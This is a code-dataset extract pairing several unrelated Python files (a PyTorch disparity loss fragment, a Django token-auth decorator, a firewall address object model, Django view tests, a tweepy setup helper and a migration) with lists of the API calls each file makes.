gy = img[:, :, :-1, :] - img[:, :, 1:, :] # NCHW
return gy
def generate_image_left(self, img, disp):
return apply_disparity(img, -disp)
def generate_image_right(self, img, disp):
return apply_disparity(img, disp)
def SSIM(self, x, y):
if self.which_ssim == 'godard':
return ssim_godard(x, y)
elif self.which_ssim == 'gauss':
return ssim_gauss(x, y, window_size=self.ssim_window_size)
else:
raise ValueError('{} version not implemented'.format(self.which_ssim))
def disp_smoothness(self, disp, pyramid):
disp_gradients_x = [self.gradient_x(d) for d in disp]
disp_gradients_y = [self.gradient_y(d) for d in disp]
image_gradients_x = [self.gradient_x(img) for img in pyramid]
image_gradients_y = [self.gradient_y(img) for img in pyramid]
weights_x = [torch.exp(-torch.mean(torch.abs(g), 1, keepdim=True)) for g in image_gradients_x]
weights_y = [torch.exp(-torch.mean(torch.abs(g), 1, keepdim=True)) for g in image_gradients_y]
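        # Note: self.n (the number of pyramid scales) is not defined in this
        # base class; it is assumed to be set by the concrete subclass.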
smoothness_x = [disp_gradients_x[i] * weights_x[i] for i in range(self.n)]
smoothness_y = [disp_gradients_y[i] * weights_y[i] for i in range(self.n)]
return smoothness_x + smoothness_y
def forward(self, input, target):
pass
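# Minimal usage sketch (hypothetical subclass; setting self.n is required by
# disp_smoothness above):
#
#     class ExampleLoss(BaseGeneratorLoss):
#         def __init__(self, args):
#             super(ExampleLoss, self).__init__(args)
#             self.n = 4  # number of pyramid scales
#
#     loss_fn = ExampleLoss(args)
#     pyramid = loss_fn.scale_pyramid(left_image, 4)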
|
[
"torch.nn.functional.interpolate",
"losses.bilinear_sampler.apply_disparity",
"torch.abs",
"torch.nn.functional.pad"
] |
[((881, 923), 'torch.nn.functional.pad', 'F.pad', (['img', '(0, 1, 0, 0)'], {'mode': '"""replicate"""'}), "(img, (0, 1, 0, 0), mode='replicate')\n", (886, 923), True, 'import torch.nn.functional as F\n'), ((1097, 1139), 'torch.nn.functional.pad', 'F.pad', (['img', '(0, 0, 0, 1)'], {'mode': '"""replicate"""'}), "(img, (0, 0, 0, 1), mode='replicate')\n", (1102, 1139), True, 'import torch.nn.functional as F\n'), ((1278, 1305), 'losses.bilinear_sampler.apply_disparity', 'apply_disparity', (['img', '(-disp)'], {}), '(img, -disp)\n', (1293, 1305), False, 'from losses.bilinear_sampler import apply_disparity\n'), ((1369, 1395), 'losses.bilinear_sampler.apply_disparity', 'apply_disparity', (['img', 'disp'], {}), '(img, disp)\n', (1384, 1395), False, 'from losses.bilinear_sampler import apply_disparity\n'), ((677, 755), 'torch.nn.functional.interpolate', 'nn.functional.interpolate', (['img', '[nh, nw]'], {'mode': '"""bilinear"""', 'align_corners': '(False)'}), "(img, [nh, nw], mode='bilinear', align_corners=False)\n", (702, 755), True, 'import torch.nn as nn\n'), ((2065, 2077), 'torch.abs', 'torch.abs', (['g'], {}), '(g)\n', (2074, 2077), False, 'import torch\n'), ((2168, 2180), 'torch.abs', 'torch.abs', (['g'], {}), '(g)\n', (2177, 2180), False, 'import torch\n')]
|
from essentials.views import randomString,getCurrentTime,errorResp
from models import authToken,verificationCode
from constants import AUTH_EXPIRY_MINS
from StockNest.settings import LOGIN_URL
from django.http import HttpResponseRedirect,JsonResponse,HttpRequest
from django.db.models import Q
from school.funcs import isDemoUser, demoError
# server = "https://eduhubweb.com"
# if DEBUG:
# server = "http://localhost:8000"
def getNewAuth():
while(1):
new_auth = randomString(50)
existing = authToken.objects.filter(Q(mauth = new_auth)|Q(wauth = new_auth)|Q(pmauth = new_auth)|Q(pwauth = new_auth)).count()
if existing == 0:
return new_auth
def getUserAuth(typeVal,u):
if typeVal == 'm':
try:
at = authToken.objects.get(user=u)
at.misExpired = False
at.mlastUpdated = getCurrentTime()
at.pmauth = at.mauth
at.mauth = getNewAuth()
at.save()
return at.mauth
except authToken.DoesNotExist:#first login
at = authToken.objects.create(user=u, mauth = getNewAuth(),wauth= getNewAuth(),pmauth = getNewAuth(),pwauth= getNewAuth())
return at.mauth
elif typeVal == 'w':
try:
at = authToken.objects.get(user=u)
at.wisExpired = False
at.wlastUpdated = getCurrentTime()
at.pwauth = at.wauth
at.wauth = getNewAuth()
at.save()
return at.wauth
except authToken.DoesNotExist:#first login
at = authToken.objects.create(user=u, mauth = getNewAuth(),wauth= getNewAuth(),pmauth = getNewAuth(),pwauth= getNewAuth())
return at.wauth
### authentication decorator for our website
### time based
def stocknestAPI(loginRequired=False,function=None):
def _dec(view_func):
def _view(request, *args, **kwargs):
request.user = None
headers = request.META
if loginRequired:#if required, return 401/412
if 'HTTP_AUTHORIZATION' in headers:
value = headers['HTTP_AUTHORIZATION'] #format keyw/m=auth
elements = value.split('=')
if len(elements) != 2:
return errorResp(401)
auth_val = elements[1]
if elements[0] == 'keym':
try:
obj = authToken.objects.get(mauth=auth_val)
if not checkAuthTimestamp(obj.mlastUpdated):
obj.misExpired = True
obj.save()
return errorResp(412,"Auth expired")
request.user = obj.user
if request.method in ['POST','PUT','PATCH','DELETE']:
if isDemoUser(request.user):
return demoError()
return view_func(request, *args, **kwargs)
except authToken.DoesNotExist:
try:
obj = authToken.objects.get(pmauth=auth_val)
if not checkAuthTimestamp(obj.mlastUpdated):
obj.misExpired = True
obj.save()
return errorResp(412,"Auth expired")
request.user = obj.user
if request.method in ['POST','PUT','PATCH','DELETE']:
if isDemoUser(request.user):
return demoError()
return view_func(request, *args, **kwargs)
except authToken.DoesNotExist:
return errorResp(401,"Token not found")
elif elements[0] == 'keyw':
try:
obj = authToken.objects.get(wauth=auth_val)
if not checkAuthTimestamp(obj.wlastUpdated):
obj.wisExpired = True
obj.save()
return errorResp(412,"Auth expired")
request.user = obj.user
if request.method in ['POST','PUT','PATCH','DELETE']:
if isDemoUser(request.user):
return demoError()
return view_func(request, *args, **kwargs)
except authToken.DoesNotExist:
try:
obj = authToken.objects.get(pwauth=auth_val)
if not checkAuthTimestamp(obj.wlastUpdated):
obj.wisExpired = True
obj.save()
return errorResp(412,"Auth expired")
request.user = obj.user
if request.method in ['POST','PUT','PATCH','DELETE']:
if isDemoUser(request.user):
return demoError()
return view_func(request, *args, **kwargs)
except authToken.DoesNotExist:
return errorResp(401,"Token not found")
else:
return errorResp(401)
else:
return errorResp(401)
else:#not required send 412
if 'HTTP_AUTHORIZATION' in headers:
value = headers['HTTP_AUTHORIZATION'] #format key=auth
elements = value.split('=')
if len(elements) != 2:
return errorResp(401)
auth_val = elements[1]
if elements[0] == 'keym':
try:
obj = authToken.objects.get(mauth=auth_val)
if not checkAuthTimestamp(obj.mlastUpdated):
obj.misExpired = True
obj.save()
return errorResp(412,"Auth expired")
request.user = obj.user
if request.method in ['PATCH','DELETE']:
if isDemoUser(request.user):
return demoError()
return view_func(request, *args, **kwargs)
except authToken.DoesNotExist:
try:
obj = authToken.objects.get(pmauth=auth_val)
if not checkAuthTimestamp(obj.mlastUpdated):
obj.misExpired = True
obj.save()
return errorResp(412,"Auth expired")
request.user = obj.user
if request.method in ['PATCH','DELETE']:
if isDemoUser(request.user):
return demoError()
return view_func(request, *args, **kwargs)
except authToken.DoesNotExist:
return errorResp(401,"Token not found")
elif elements[0] == 'keyw':
try:
obj = authToken.objects.get(wauth=auth_val)
if not checkAuthTimestamp(obj.wlastUpdated):
obj.wisExpired = True
obj.save()
return errorResp(412,"Auth expired")
request.user = obj.user
if request.method in ['PATCH','DELETE']:
if isDemoUser(request.user):
return demoError()
return view_func(request, *args, **kwargs)
except authToken.DoesNotExist:
try:
obj = authToken.objects.get(pwauth=auth_val)
if not checkAuthTimestamp(obj.wlastUpdated):
obj.wisExpired = True
obj.save()
return errorResp(412,"Auth expired")
request.user = obj.user
if request.method in ['PATCH','DELETE']:
if isDemoUser(request.user):
return demoError()
return view_func(request, *args, **kwargs)
except authToken.DoesNotExist:
return errorResp(401,"Token not found")
return view_func(request, *args, **kwargs)
_view.__name__ = view_func.__name__
_view.__dict__ = view_func.__dict__
_view.__doc__ = view_func.__doc__
return _view
if function is None:
return _dec
else:
return _dec(function)
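# Usage sketch (hypothetical view; the client sends an Authorization header of
# the form "keym=<token>" for mobile or "keyw=<token>" for web):
#
#     @stocknestAPI(loginRequired=True)
#     def portfolio(request):
#         ...  # request.user is populated from the matched authToken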
def checkAuthTimestamp(timestamp):
current_time = getCurrentTime()
return ((current_time - timestamp).days == 0 and (current_time - timestamp).seconds < AUTH_EXPIRY_MINS*60)
def getRequestUser(request):
user = None
if 'wauth' in request.COOKIES :
wauth = request.COOKIES['wauth']
try:
obj = authToken.objects.get(wauth=wauth)
user = obj.user
except authToken.DoesNotExist:
try:
obj = authToken.objects.get(pwauth=wauth)
user = obj.user
except authToken.DoesNotExist:
pass
return user
def getVerificationToken(u,ty):
if ty == 'ev' or ty == 'pr':
try:
vc = verificationCode.objects.get(user= u,ctype=ty)
except verificationCode.DoesNotExist:
code = randomString(6)
token = randomString(50)
vc = verificationCode.objects.create(code = code,user= u,token=token,ctype=ty)
return vc
else:
raise ValueError
|
[
"essentials.views.errorResp",
"essentials.views.getCurrentTime",
"essentials.views.randomString",
"school.funcs.isDemoUser",
"models.authToken.objects.get",
"models.verificationCode.objects.get",
"django.db.models.Q",
"school.funcs.demoError",
"models.verificationCode.objects.create"
] |
[((9527, 9543), 'essentials.views.getCurrentTime', 'getCurrentTime', ([], {}), '()\n', (9541, 9543), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((480, 496), 'essentials.views.randomString', 'randomString', (['(50)'], {}), '(50)\n', (492, 496), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((768, 797), 'models.authToken.objects.get', 'authToken.objects.get', ([], {'user': 'u'}), '(user=u)\n', (789, 797), False, 'from models import authToken, verificationCode\n'), ((862, 878), 'essentials.views.getCurrentTime', 'getCurrentTime', ([], {}), '()\n', (876, 878), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((9809, 9843), 'models.authToken.objects.get', 'authToken.objects.get', ([], {'wauth': 'wauth'}), '(wauth=wauth)\n', (9830, 9843), False, 'from models import authToken, verificationCode\n'), ((10200, 10246), 'models.verificationCode.objects.get', 'verificationCode.objects.get', ([], {'user': 'u', 'ctype': 'ty'}), '(user=u, ctype=ty)\n', (10228, 10246), False, 'from models import authToken, verificationCode\n'), ((1276, 1305), 'models.authToken.objects.get', 'authToken.objects.get', ([], {'user': 'u'}), '(user=u)\n', (1297, 1305), False, 'from models import authToken, verificationCode\n'), ((1370, 1386), 'essentials.views.getCurrentTime', 'getCurrentTime', ([], {}), '()\n', (1384, 1386), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((10312, 10327), 'essentials.views.randomString', 'randomString', (['(6)'], {}), '(6)\n', (10324, 10327), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((10348, 10364), 'essentials.views.randomString', 'randomString', (['(50)'], {}), '(50)\n', (10360, 10364), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((10382, 10455), 'models.verificationCode.objects.create', 'verificationCode.objects.create', ([], {'code': 'code', 'user': 'u', 'token': 'token', 'ctype': 'ty'}), '(code=code, user=u, token=token, ctype=ty)\n', (10413, 10455), False, 'from models import authToken, verificationCode\n'), ((5664, 5678), 'essentials.views.errorResp', 'errorResp', (['(401)'], {}), '(401)\n', (5673, 5678), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((9955, 9990), 'models.authToken.objects.get', 'authToken.objects.get', ([], {'pwauth': 'wauth'}), '(pwauth=wauth)\n', (9976, 9990), False, 'from models import authToken, verificationCode\n'), ((602, 620), 'django.db.models.Q', 'Q', ([], {'pwauth': 'new_auth'}), '(pwauth=new_auth)\n', (603, 620), False, 'from django.db.models import Q\n'), ((2284, 2298), 'essentials.views.errorResp', 'errorResp', (['(401)'], {}), '(401)\n', (2293, 2298), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((5968, 5982), 'essentials.views.errorResp', 'errorResp', (['(401)'], {}), '(401)\n', (5977, 5982), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((581, 599), 'django.db.models.Q', 'Q', ([], {'pmauth': 'new_auth'}), '(pmauth=new_auth)\n', (582, 599), False, 'from django.db.models import Q\n'), ((2452, 2489), 'models.authToken.objects.get', 'authToken.objects.get', ([], {'mauth': 'auth_val'}), '(mauth=auth_val)\n', (2473, 2489), False, 'from models import authToken, verificationCode\n'), ((5600, 5614), 'essentials.views.errorResp', 'errorResp', (['(401)'], {}), '(401)\n', (5609, 5614), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((6136, 6173), 'models.authToken.objects.get', 'authToken.objects.get', ([], {'mauth': 'auth_val'}), '(mauth=auth_val)\n', (6157, 6173), False, 'from models import authToken, verificationCode\n'), ((541, 558), 'django.db.models.Q', 'Q', ([], {'mauth': 'new_auth'}), '(mauth=new_auth)\n', (542, 558), False, 'from django.db.models import Q\n'), ((561, 578), 'django.db.models.Q', 'Q', ([], {'wauth': 'new_auth'}), '(wauth=new_auth)\n', (562, 578), False, 'from django.db.models import Q\n'), ((2699, 2729), 'essentials.views.errorResp', 'errorResp', (['(412)', '"""Auth expired"""'], {}), "(412, 'Auth expired')\n", (2708, 2729), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((2898, 2922), 'school.funcs.isDemoUser', 'isDemoUser', (['request.user'], {}), '(request.user)\n', (2908, 2922), False, 'from school.funcs import isDemoUser, demoError\n'), ((4053, 4090), 'models.authToken.objects.get', 'authToken.objects.get', ([], {'wauth': 'auth_val'}), '(wauth=auth_val)\n', (4074, 4090), False, 'from models import authToken, verificationCode\n'), ((6383, 6413), 'essentials.views.errorResp', 'errorResp', (['(412)', '"""Auth expired"""'], {}), "(412, 'Auth expired')\n", (6392, 6413), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((6569, 6593), 'school.funcs.isDemoUser', 'isDemoUser', (['request.user'], {}), '(request.user)\n', (6579, 6593), False, 'from school.funcs import isDemoUser, demoError\n'), ((7711, 7748), 'models.authToken.objects.get', 'authToken.objects.get', ([], {'wauth': 'auth_val'}), '(wauth=auth_val)\n', (7732, 7748), False, 'from models import authToken, verificationCode\n'), ((2967, 2978), 'school.funcs.demoError', 'demoError', ([], {}), '()\n', (2976, 2978), False, 'from school.funcs import isDemoUser, demoError\n'), ((3176, 3214), 'models.authToken.objects.get', 'authToken.objects.get', ([], {'pmauth': 'auth_val'}), '(pmauth=auth_val)\n', (3197, 3214), False, 'from models import authToken, verificationCode\n'), ((4300, 4330), 'essentials.views.errorResp', 'errorResp', (['(412)', '"""Auth expired"""'], {}), "(412, 'Auth expired')\n", (4309, 4330), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((4499, 4523), 'school.funcs.isDemoUser', 'isDemoUser', (['request.user'], {}), '(request.user)\n', (4509, 4523), False, 'from school.funcs import isDemoUser, demoError\n'), ((6638, 6649), 'school.funcs.demoError', 'demoError', ([], {}), '()\n', (6647, 6649), False, 'from school.funcs import isDemoUser, demoError\n'), ((6847, 6885), 'models.authToken.objects.get', 'authToken.objects.get', ([], {'pmauth': 'auth_val'}), '(pmauth=auth_val)\n', (6868, 6885), False, 'from models import authToken, verificationCode\n'), ((7958, 7988), 'essentials.views.errorResp', 'errorResp', (['(412)', '"""Auth expired"""'], {}), "(412, 'Auth expired')\n", (7967, 7988), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((8144, 8168), 'school.funcs.isDemoUser', 'isDemoUser', (['request.user'], {}), '(request.user)\n', (8154, 8168), False, 'from school.funcs import isDemoUser, demoError\n'), ((3440, 3470), 'essentials.views.errorResp', 'errorResp', (['(412)', '"""Auth expired"""'], {}), "(412, 'Auth expired')\n", (3449, 3470), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((3651, 3675), 'school.funcs.isDemoUser', 'isDemoUser', (['request.user'], {}), '(request.user)\n', (3661, 3675), False, 'from school.funcs import isDemoUser, demoError\n'), ((3909, 3942), 'essentials.views.errorResp', 'errorResp', (['(401)', '"""Token not found"""'], {}), "(401, 'Token not found')\n", (3918, 3942), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((4568, 4579), 'school.funcs.demoError', 'demoError', ([], {}), '()\n', (4577, 4579), False, 'from school.funcs import isDemoUser, demoError\n'), ((4777, 4815), 'models.authToken.objects.get', 'authToken.objects.get', ([], {'pwauth': 'auth_val'}), '(pwauth=auth_val)\n', (4798, 4815), False, 'from models import authToken, verificationCode\n'), ((7111, 7141), 'essentials.views.errorResp', 'errorResp', (['(412)', '"""Auth expired"""'], {}), "(412, 'Auth expired')\n", (7120, 7141), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((7309, 7333), 'school.funcs.isDemoUser', 'isDemoUser', (['request.user'], {}), '(request.user)\n', (7319, 7333), False, 'from school.funcs import isDemoUser, demoError\n'), ((7567, 7600), 'essentials.views.errorResp', 'errorResp', (['(401)', '"""Token not found"""'], {}), "(401, 'Token not found')\n", (7576, 7600), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((8213, 8224), 'school.funcs.demoError', 'demoError', ([], {}), '()\n', (8222, 8224), False, 'from school.funcs import isDemoUser, demoError\n'), ((8422, 8460), 'models.authToken.objects.get', 'authToken.objects.get', ([], {'pwauth': 'auth_val'}), '(pwauth=auth_val)\n', (8443, 8460), False, 'from models import authToken, verificationCode\n'), ((3724, 3735), 'school.funcs.demoError', 'demoError', ([], {}), '()\n', (3733, 3735), False, 'from school.funcs import isDemoUser, demoError\n'), ((5041, 5071), 'essentials.views.errorResp', 'errorResp', (['(412)', '"""Auth expired"""'], {}), "(412, 'Auth expired')\n", (5050, 5071), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((5252, 5276), 'school.funcs.isDemoUser', 'isDemoUser', (['request.user'], {}), '(request.user)\n', (5262, 5276), False, 'from school.funcs import isDemoUser, demoError\n'), ((5510, 5543), 'essentials.views.errorResp', 'errorResp', (['(401)', '"""Token not found"""'], {}), "(401, 'Token not found')\n", (5519, 5543), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((7382, 7393), 'school.funcs.demoError', 'demoError', ([], {}), '()\n', (7391, 7393), False, 'from school.funcs import isDemoUser, demoError\n'), ((8686, 8716), 'essentials.views.errorResp', 'errorResp', (['(412)', '"""Auth expired"""'], {}), "(412, 'Auth expired')\n", (8695, 8716), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((8884, 8908), 'school.funcs.isDemoUser', 'isDemoUser', (['request.user'], {}), '(request.user)\n', (8894, 8908), False, 'from school.funcs import isDemoUser, demoError\n'), ((9142, 9175), 'essentials.views.errorResp', 'errorResp', (['(401)', '"""Token not found"""'], {}), "(401, 'Token not found')\n", (9151, 9175), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((5325, 5336), 'school.funcs.demoError', 'demoError', ([], {}), '()\n', (5334, 5336), False, 'from school.funcs import isDemoUser, demoError\n'), ((8957, 8968), 'school.funcs.demoError', 'demoError', ([], {}), '()\n', (8966, 8968), False, 'from school.funcs import isDemoUser, demoError\n')]
|
from nca47.db import api as db_api
from nca47.objects import base
from nca47.objects import fields as object_fields
from nca47.db.sqlalchemy.models.firewall import ADDROBJ
class FwAddrObjInfo(base.Nca47Object):
VERSION = '1.0'
fields = {
'id': object_fields.StringField(),
'name': object_fields.StringField(),
'ip': object_fields.StringField(),
'expip': object_fields.StringField(),
'vfwname': object_fields.StringField(),
'vfw_id': object_fields.StringField(),
'operation_fro': object_fields.StringField()
}
def __init__(self, context=None, **kwarg):
self.db_api = db_api.get_instance()
        super(FwAddrObjInfo, self).__init__(context=context, **kwarg)
@staticmethod
def _from_db_object(fw_addrobj_info, db_fw_addrobj_info):
"""Converts a database entity to a formal :class:`ADDROBJ` object.
:param fw_addrobj_info: An object of :class:`ADDROBJ`.
        :param db_fw_addrobj_info: A DB model of an ADDROBJ.
:return: a :class:`ADDROBJ` object.
"""
for field in fw_addrobj_info.fields:
fw_addrobj_info[field] = db_fw_addrobj_info[field]
fw_addrobj_info.obj_reset_changes()
return fw_addrobj_info
def create(self, context, values):
addrobj = self.db_api.create(ADDROBJ, values)
return addrobj
def delete(self, context, id_):
addrobj = self.db_api.delete_object(ADDROBJ, id_)
return addrobj
def get_object(self, context, **values):
addrobj = self.db_api.get_object(ADDROBJ, **values)
return addrobj
def get_objects(self, context, **values):
addrobj = self.db_api.get_objects(ADDROBJ, **values)
return addrobj
|
[
"nca47.objects.fields.StringField",
"nca47.db.api.get_instance"
] |
[((263, 290), 'nca47.objects.fields.StringField', 'object_fields.StringField', ([], {}), '()\n', (288, 290), True, 'from nca47.objects import fields as object_fields\n'), ((308, 335), 'nca47.objects.fields.StringField', 'object_fields.StringField', ([], {}), '()\n', (333, 335), True, 'from nca47.objects import fields as object_fields\n'), ((351, 378), 'nca47.objects.fields.StringField', 'object_fields.StringField', ([], {}), '()\n', (376, 378), True, 'from nca47.objects import fields as object_fields\n'), ((397, 424), 'nca47.objects.fields.StringField', 'object_fields.StringField', ([], {}), '()\n', (422, 424), True, 'from nca47.objects import fields as object_fields\n'), ((445, 472), 'nca47.objects.fields.StringField', 'object_fields.StringField', ([], {}), '()\n', (470, 472), True, 'from nca47.objects import fields as object_fields\n'), ((492, 519), 'nca47.objects.fields.StringField', 'object_fields.StringField', ([], {}), '()\n', (517, 519), True, 'from nca47.objects import fields as object_fields\n'), ((546, 573), 'nca47.objects.fields.StringField', 'object_fields.StringField', ([], {}), '()\n', (571, 573), True, 'from nca47.objects import fields as object_fields\n'), ((650, 671), 'nca47.db.api.get_instance', 'db_api.get_instance', ([], {}), '()\n', (669, 671), True, 'from nca47.db import api as db_api\n')]
|
from pytest_django.asserts import assertTemplateUsed
from fixtures_views import *
class TestInformesView:
@pytest.fixture
def form_parametros(self, django_app):
resp = django_app.get(reverse('main:informes'), user='username')
return resp.forms['parametros']
@pytest.fixture
def populate_db_informes(self, populate_database):
_, cuentas, _ = populate_database
adicionales = [
[5, '2021-01-28', 'Compra del pan', 2.50, 0, cuentas[0]],
[5, '2021-01-28', 'Compra del pan', 0, 2.50, cuentas[3]],
[6, '2021-02-15', 'Compra de fruta', 10.75, 0, cuentas[0]],
[6, '2021-02-15', 'Compra de fruta', 0, 10.75, cuentas[3]],
[7, '2021-03-18', 'Calcetines y calzoncillos', 15.85, 0, cuentas[1]],
[7, '2021-03-18', 'Calcetines y calzoncillos', 0, 15.85, cuentas[3]],
[8, '2021-04-20', 'Abrigo de invierno', 54, 0, cuentas[1]],
[8, '2021-04-20', 'Abrigo de invierno', 0, 54, cuentas[3]],
]
for num, fecha, descripcion, debe, haber, cuenta in adicionales:
Movimiento.objects.create(num=num, fecha=fecha,
descripcion=descripcion, debe=debe, haber=haber, cuenta=cuenta)
@pytest.mark.parametrize('page', ['/informes/', reverse('main:informes')])
def test_redirect_if_not_logged_in(self, page, django_app):
resp = django_app.get(page)
assert resp.status_code == 302
assert resp.url.startswith('/accounts/login/')
@pytest.mark.parametrize('page', ['/informes/', reverse('main:informes')])
def test_view_url_exists_at_desired_location(self, page, django_app):
resp = django_app.get(page, user='username')
assert resp.status_code == 200
@pytest.mark.parametrize('page', ['/informes/', reverse('main:informes')])
def test_view_uses_correct_template(self, page, django_app):
resp = django_app.get(page, user='username')
assertTemplateUsed(resp, 'main/informes.html')
def test_parametros_form_attributes(self, form_parametros):
form = form_parametros
assert form.id == 'parametros'
assert form.method == 'post'
assert form.action == '/informes/'
assert form.action == reverse('main:informes')
fields = form.fields.keys()
for f in ['f_fecha_inicial', 'f_fecha_final', 'f_tipo', 'f_cuenta', 'f_etiqueta']:
assert f in fields
@pytest.mark.parametrize('tipo, fecha_col', [
('diario', 'Fecha'), ('semanal', 'Semana'), ('mensual', 'Mes'),
        ('trimestral', 'Trimestre'), ('anual', 'Año')
])
def test_parametros_form_attributes_tipo(self, form_parametros, populate_db_informes, tipo, fecha_col):
populate_db_informes
form = form_parametros
form['f_tipo'].select(text=tipo)
resp = form.submit()
# check title and subtitle
for text in ['Todas las cuentas', f'Informe {tipo}, todas las fechas']:
assert text in resp.text
# check columns of table
for col in [fecha_col, 'Debe', 'Haber', 'Total']:
assert col in resp.text
@pytest.mark.parametrize('fecha_ini, fecha_fin, expected_subtitle', [
('', '2022-01-29', 'Informe diario, desde el principio hasta 2022-01-29'),
('2022-01-29', '', 'Informe diario, desde 2022-01-29 hasta el final'),
('2022-01-01', '2022-01-31', 'Informe diario, desde 2022-01-01 hasta 2022-01-31'),
], ids=['fecha-inicial', 'fecha-final', 'ambas-fechas'])
def test_form_fechas(self, form_parametros, populate_db_informes, fecha_ini, fecha_fin, expected_subtitle):
populate_db_informes
form = form_parametros
form['f_fecha_inicial'] = fecha_ini
form['f_fecha_final'] = fecha_fin
resp = form.submit()
# check title and subtitle
for text in ['Todas las cuentas', expected_subtitle]:
assert text in resp.text
@pytest.mark.parametrize('cuenta, etiqueta, expected_title', [
('100: Caja', '', 'Cuenta 100: Caja'),
('', 'gastos', 'Cuentas del tipo: Gastos corrientes'),
('100: Caja', 'gastos', 'Cuenta 100: Caja'),
], ids=['cuenta-solo', 'etiqueta-solo', 'cuenta-y-etiqueta'])
def test_form_cuentas(self, form_parametros, populate_db_informes, cuenta, etiqueta, expected_title):
populate_db_informes
form = form_parametros
form['f_cuenta'] = cuenta
form['f_etiqueta'] = etiqueta
resp = form.submit()
# check title and subtitle
for text in [expected_title, 'Informe diario, todas las fechas']:
assert text in resp.text
|
[
"pytest_django.asserts.assertTemplateUsed"
] |
[((1968, 2014), 'pytest_django.asserts.assertTemplateUsed', 'assertTemplateUsed', (['resp', '"""main/informes.html"""'], {}), "(resp, 'main/informes.html')\n", (1986, 2014), False, 'from pytest_django.asserts import assertTemplateUsed\n')]
|
import tweepy
from logger_config import logger
from secrets import *
def create_api():
auth = tweepy.OAuthHandler(API_KEY, API_SECRET)
auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)
api = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)
try:
api.verify_credentials()
except Exception as e:
logger.error(f"Error {e} creating API.", exc_info=True)
logger.info("API successfully created.")
return api
|
[
"tweepy.OAuthHandler",
"logger_config.logger.info",
"logger_config.logger.error",
"tweepy.API"
] |
[((99, 139), 'tweepy.OAuthHandler', 'tweepy.OAuthHandler', (['API_KEY', 'API_SECRET'], {}), '(API_KEY, API_SECRET)\n', (118, 139), False, 'import tweepy\n'), ((211, 284), 'tweepy.API', 'tweepy.API', (['auth'], {'wait_on_rate_limit': '(True)', 'wait_on_rate_limit_notify': '(True)'}), '(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)\n', (221, 284), False, 'import tweepy\n'), ((423, 463), 'logger_config.logger.info', 'logger.info', (['"""API successfully created."""'], {}), "('API successfully created.')\n", (434, 463), False, 'from logger_config import logger\n'), ((363, 418), 'logger_config.logger.error', 'logger.error', (['f"""Error {e} creating API."""'], {'exc_info': '(True)'}), "(f'Error {e} creating API.', exc_info=True)\n", (375, 418), False, 'from logger_config import logger\n')]
|
# Generated by Django 3.0.2 on 2020-04-13 17:03
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('mob', models.CharField(max_length=100)),
('fever', models.IntegerField()),
('tired', models.BooleanField(default=False)),
('throat', models.BooleanField(default=False)),
('bodypain', models.BooleanField(default=False)),
('invisit', models.BooleanField(default=False)),
('pubvisit', models.BooleanField(default=False)),
('hivisit', models.BooleanField(default=False)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
),
]
|
[
"django.db.models.CharField",
"django.db.models.BooleanField",
"django.db.models.AutoField",
"django.db.models.IntegerField",
"django.db.models.DateTimeField"
] |
[((300, 393), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (316, 393), False, 'from django.db import migrations, models\n'), ((416, 448), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (432, 448), False, 'from django.db import migrations, models\n'), ((477, 498), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (496, 498), False, 'from django.db import migrations, models\n'), ((527, 561), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (546, 561), False, 'from django.db import migrations, models\n'), ((591, 625), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (610, 625), False, 'from django.db import migrations, models\n'), ((657, 691), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (676, 691), False, 'from django.db import migrations, models\n'), ((722, 756), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (741, 756), False, 'from django.db import migrations, models\n'), ((788, 822), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (807, 822), False, 'from django.db import migrations, models\n'), ((853, 887), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (872, 887), False, 'from django.db import migrations, models\n'), ((921, 960), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)'}), '(auto_now_add=True)\n', (941, 960), False, 'from django.db import migrations, models\n'), ((994, 1029), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now': '(True)'}), '(auto_now=True)\n', (1014, 1029), False, 'from django.db import migrations, models\n')]
|
